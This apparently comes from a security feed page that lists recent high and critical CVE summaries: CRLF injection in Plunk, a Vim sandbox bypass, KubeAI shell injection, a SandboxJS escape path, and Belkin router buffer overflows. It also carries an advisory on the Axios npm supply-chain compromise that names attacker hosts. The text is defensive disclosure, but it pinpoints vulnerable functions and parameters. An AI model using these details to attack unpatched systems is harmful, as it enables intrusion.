2026-04-06
2026-04-06 17:17Z
HIGH

CVE-2026-34975 — Plunk: Prior to 0.8.0, a CRLF header injection vulnerability was discovered in SESService.ts, where user-supplied

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34975

Plunk is an open-source email platform built on top of AWS SES. Prior to 0.8.0, a CRLF header injection vulnerability was discovered in SESService.ts, where user-supplied values for from.name, subject, custom header keys/values, and attachment filenames were interpolated directly into raw MIME messages without sanitization. An authenticated API user could inject arbitrary email headers (e.g. Bcc, Reply-To) by embedding carriage return/line feed characters in these fields, ena CVSSv3.1 8.5 (HIGH)

CWECWE 93VNDPlunkTYPVulnerability
8.5
CVSS v3.1
93
Edit Score
2026-04-06
2026-04-06 17:17Z
CRIT

CVE-2026-34841 — Bruno: Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34841

Bruno is an open source IDE for exploring and testing APIs. Prior to 3.2.1, Bruno was affected by a supply chain attack involving compromised versions of the axios npm package, which introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT). Users of @usebruno/cli who ran npm install between 00:21 UTC and ~03:30 UTC on March 31, 2026 may have been impacted. Upgrade to 3.2.1 CVSSv3.1 9.8 (CRITICAL)

CWECWE 506CWECWE 494VNDBrunoTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-06
2026-04-06 17:17Z
HIGH

CVE-2026-34783 — Montferret Ferret: Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34783

Ferret is a declarative system for working with web data. Prior to 2.0.0-alpha.4, a path traversal vulnerability in Ferret's IO::FS::WRITE standard library function allows a malicious website to write arbitrary files to the filesystem of the machine running Ferret. When an operator scrapes a website that returns filenames containing ../ sequences, and uses those filenames to construct output paths (a standard scraping pattern), the attacker controls both the destination path CVSSv3.1 8.1 (HIGH)

CWECWE 22CWECWE 73VNDMontferretVNDFerretTYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-06
2026-04-06 16:16Z
HIGH

CVE-2026-34982 — Vim: Prior to version 9.2.0276, a modeline sandbox bypass in Vim allows arbitrary OS command

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34982

Vim is an open source, command line text editor. Prior to version 9.2.0276, a modeline sandbox bypass in Vim allows arbitrary OS command execution when a user opens a crafted file. The `complete`, `guitabtooltip` and `printheader` options are missing the `P_MLE` flag, allowing a modeline to be executed. Additionally, the `mapset()` function lacks a `check_secure()` call, allowing it to be abused from sandboxed expressions. Commit 9.2.0276 fixes the issue. CVSSv3.1 8.2 (HIGH)

CWECWE 78VNDVimTYPVulnerability
8.2
CVSS v3.1
91
Edit Score
2026-04-06
2026-04-06 16:16Z
CRIT

CVE-2026-34950 — JSON: fast-jwt provides fast JSON Web Token (JWT) implementation.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34950

fast-jwt provides fast JSON Web Token (JWT) implementation. In 6.1.0 and earlier, the publicKeyPemMatcher regex in fast-jwt/src/crypto.js uses a ^ anchor that is defeated by any leading whitespace in the key string, re-enabling the exact same JWT algorithm confusion attack that CVE-2023-48223 patched. CVSSv3.1 9.1 (CRITICAL)

CWECWE 327TYPVulnerability
9.1
CVSS v3.1
96
Edit Score
2026-04-06
2026-04-06 16:16Z
HIGH

CVE-2026-34940 — Kubeai Kubeai: Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34940

KubeAI is an AI inference operator for kubernetes. Prior to 0.23.2, the ollamaStartupProbeScript() function in internal/modelcontroller/engine_ollama.go constructs a shell command string using fmt.Sprintf with unsanitized model URL components (ref, modelParam). This shell command is executed via bash -c as a Kubernetes startup probe. An attacker who can create or update Model custom resources can inject arbitrary shell commands that execute inside model server pods. This vuln CVSSv3.1 8.8 (HIGH)

CWECWE 78VNDKubeaiTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 16:16Z
CRIT

CVE-2026-34444 — Scoder Lupa: This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34444

Lupa integrates the runtimes of Lua or LuaJIT2 into CPython. In 2.6 and earlier, attribute_filter is not consistently applied when attributes are accessed through built-in functions like getattr and setattr. This allows an attacker to bypass the intended restrictions and eventually achieve arbitrary code execution. CVSSv3.1 10.0 (CRITICAL) · EPSS 8th percentile

CWECWE 639CWECWE 284VNDScoderVNDLupaTYPVulnerability
10.0
CVSS v3.1
100
Edit Score
728 × 90 / responsive · programmatic ad slot
2026-04-06
2026-04-06 16:16Z
CRIT

CVE-2026-34208 — Nyariv Sandboxjs: Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random =

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34208

SandboxJS is a JavaScript sandboxing library. Prior to 0.8.36, SandboxJS blocks direct assignment to global objects (for example Math.random = ...), but this protection can be bypassed through an exposed callable constructor path: this.constructor.call(target, attackerObject). Because this.constructor resolves to the internal SandboxGlobal function and Function.prototype.call is allowed, attacker code can write arbitrary properties into host global objects and persist those m CVSSv3.1 10.0 (CRITICAL)

CWECWE 693CWECWE 915VNDNyarivVNDSandboxjsTYPVulnerability
10.0
CVSS v3.1
100
Edit Score
2026-04-06
2026-04-06 16:16Z
HIGH

CVE-2026-33752 — Lexiforest Curl_cffi: In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33752

curl_cffi is the a Python binding for curl. Prior to 0.15.0, curl_cffi does not restrict requests to internal IP ranges, and follows redirects automatically via the underlying libcurl. Because of this, an attacker-controlled URL can redirect requests to internal services such as cloud metadata endpoints. In addition, curl_cffi’s TLS impersonation feature can make these requests appear as legitimate browser traffic, which may bypass certain network controls. This vulnerability CVSSv3.1 8.6 (HIGH)

CWECWE 918VNDLexiforestTYPVulnerability
8.6
CVSS v3.1
93
Edit Score
2026-04-06
2026-04-06 16:16Z
HIGH

CVE-2025-47392 — Qualcomm 5g_fixed_wireless_access_platform_firmware: Memory corruption when decoding corrupted satellite data files with invalid signature offsets.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2025-47392

Memory corruption when decoding corrupted satellite data files with invalid signature offsets. CVSSv3.1 8.8 (HIGH)

CWECWE 190VNDQualcommTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 15:17Z
HIGH

CVE-2026-34885 — Neutralization: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-34885

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows SQL Injection.This issue affects Media LIbrary Assistant: from n/a through 3.34. CVSSv3.1 8.5 (HIGH) · EPSS 89th percentile

CWECWE 89TYPVulnerability
8.5
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 15:17Z
HIGH

CVE-2026-33510 — Homarr Homarr: Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-33510

Homarr is an open-source dashboard. Prior to 1.57.0, a DOM-based Cross-Site Scripting (XSS) vulnerability has been discovered in Homarr's /auth/login page. The application improperly trusts a URL parameter (callbackUrl), which is passed to redirect and router.push. An attacker can craft a malicious link that, when opened by an authenticated user, performs a client-side redirect and executes arbitrary JavaScript in the context of their browser. This could lead to credential th CVSSv3.1 8.8 (HIGH)

CWECWE 601CWECWE 87VNDHomarrTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 15:17Z
CRIT

CVE-2026-31151 — Kaleris Yard_management_solutions: An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31151

An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application 's resources. CVSSv3.1 9.8 (CRITICAL)

CWECWE 288VNDKalerisTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-06
2026-04-06 15:17Z
CRIT

CVE-2026-31059 — Utt 520w_firmware: A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31059

A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string. CVSSv3.1 9.8 (CRITICAL)

CWECWE 77VNDUttVNDRceTYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-06
2026-04-06 15:17Z
HIGH

CVE-2026-26263 — Glpi-project Glpi: From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-26263

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, an unauthenticated time-based blind SQL injection exists in GLPI's Search engine. This vulnerability is fixed in 11.0.6. CVSSv3.1 8.1 (HIGH)

CWECWE 89VNDGlpiVNDGlpi ProjectTYPVulnerability
8.1
CVSS v3.1
91
Edit Score
2026-04-06
2026-04-06 15:17Z
CRIT

CVE-2026-26026 — Glpi-project Glpi: From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-26026

GLPI is a free asset and IT management software package. From 11.0.0 to before 11.0.6, template injection by an administrator lead to RCE. This vulnerability is fixed in 11.0.6. CVSSv3.1 9.1 (CRITICAL)

CWECWE 94CWECWE 1336VNDGlpiVNDGlpi ProjectTYPVulnerability
9.1
CVSS v3.1
96
Edit Score
2026-04-06
2026-04-06 15:00Z
CRIT

Delivered by Trust: What the Axios Supply Chain Attack Means for Security Leaders

Bishop Fox Labs·bishopfox.comin the wild

On March 31, 2026, the widely-used Axios NPM package (versions 1.14.1 and 0.30.4) was compromised via a supply chain attack, with malicious versions containing trojanized dependencies that execute platform-specific remote access trojans (RATs) during installation. The attack chain involved compromised maintainer credentials, malicious package publication, staged payload delivery via attacker infrastructure (sfrclak.com, 142.11.206.73:8000), and persistent remote access across client, server, build, and deployment environments. Organizations are advised to immediately identify affected systems, roll back to safe versions, rotate credentials, hunt for indicators of compromise, and implement strategic dependency controls including version pinning, install-script restrictions, and SBOM-based visibility.

TACTA0001TACTA0003TACTA0011SRFSupply ChainVNDAxiosTYPThreat IntelTYPAdvisorySTGExecution
82
Edit Score
2026-04-06
2026-04-06 13:17Z
HIGH

CVE-2026-3524 — Mattermost: Plugin Legal Hold versions <=1.1.4 fail to halt request processing after a failed

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-3524

Mattermost Plugin Legal Hold versions <=1.1.4 fail to halt request processing after a failed authorization check in ServeHTTP which allows an authenticated attacker to access, create, download, and delete legal hold data via crafted API requests to the plugin's endpoints. Mattermost Advisory ID: MMSA-2026-00621 CVSSv3.1 8.8 (HIGH)

CWECWE 862VNDMattermostTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 08:16Z
HIGH

CVE-2026-31409 — Linux: In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31409

In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on failed binding request When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails ksmbd sets conn->binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. This fix it by clearing conn->binding = false in the error CVSSv3.1 8.8 (HIGH) · EPSS 2th percentile

TYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 08:16Z
HIGH

CVE-2026-31408 — Linux: In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31408

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk->sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_con CVSSv3.1 8.8 (HIGH) · EPSS 2th percentile

TYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 08:16Z
CRIT

CVE-2026-31405 — Linux: When htype equals 255, an out-of-bounds read occurs on the function pointer table, and

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-31405

In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer ta CVSSv3.1 9.8 (CRITICAL) · EPSS 3th percentile

TYPVulnerability
9.8
CVSS v3.1
99
Edit Score
2026-04-06
2026-04-06 06:16Z
HIGH

CVE-2026-5629 — Belkin: The manipulation of the argument webpage results in stack-based buffer overflow.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5629

A vulnerability was detected in Belkin F9K1015 1.00.10. The affected element is the function formSetFirewall of the file /goform/formSetFirewall. The manipulation of the argument webpage results in stack-based buffer overflow. The attack can be executed remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWECWE 121CWECWE 119VNDBelkinTYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 06:16Z
HIGH

CVE-2026-5628 — The manipulation of the argument webpage leads to stack-based buffer overflow.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5628

A security vulnerability has been detected in Belkin F9K1015 1.00.10. Impacted is the function formSetSystemSettings of the file /goform/formSetSystemSettings of the component Setting Handler. The manipulation of the argument webpage leads to stack-based buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWECWE 121CWECWE 119TYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 04:16Z
HIGH

CVE-2026-5614 — The manipulation of the argument webpage results in stack-based buffer overflow.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5614

A security flaw has been discovered in Belkin F9K1015 1.00.10. Impacted is the function formSetPassword of the file /goform/formSetPassword. The manipulation of the argument webpage results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWECWE 121CWECWE 119TYPVulnerability
8.8
CVSS v3.1
94
Edit Score
2026-04-06
2026-04-06 03:16Z
HIGH

CVE-2026-5613 — Belkin: The manipulation of the argument webpage leads to stack-based buffer overflow.

NVD (auto-promoted CVEs)·nvd.nist.govCVE-2026-5613

A vulnerability was identified in Belkin F9K1015 1.00.10. This issue affects the function formReboot of the file /goform/formReboot. The manipulation of the argument webpage leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. CVSSv3.1 8.8 (HIGH)

CWECWE 121CWECWE 119VNDBelkinTYPVulnerability
8.8
CVSS v3.1
94
Edit Score